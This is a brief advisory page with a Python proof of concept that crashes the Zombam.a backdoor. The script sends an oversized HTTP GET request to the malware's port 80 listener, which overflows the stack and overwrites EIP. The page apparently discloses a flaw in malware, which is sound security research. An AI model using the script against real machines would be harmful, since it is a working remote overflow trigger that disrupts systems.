Exploit Backdoor.Win32.Zombam.a Remote Stack Buffer Overflow

Exploit Backdoor.Win32.Zombam.a Remote Stack Buffer Overflow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
'''
Description: The malware listens on TCP port 80, sending an
HTTP GET request with 300 or more bytes will trigger buffer
overflow overwriting EIP. Type: PE32
'''
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

PACKET="GET /"+"A"*300+"HTTP/1.0\r\nHost: "+MALWARE_HOST

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PACKET)
s.close()
print("Backdoor.Win32.Zombam.a / Remote Stack Buffer Overflow")
print("MD5: 6c5081e9b65a52963b0b1ae612ef7eb4")
print("By Malvuln")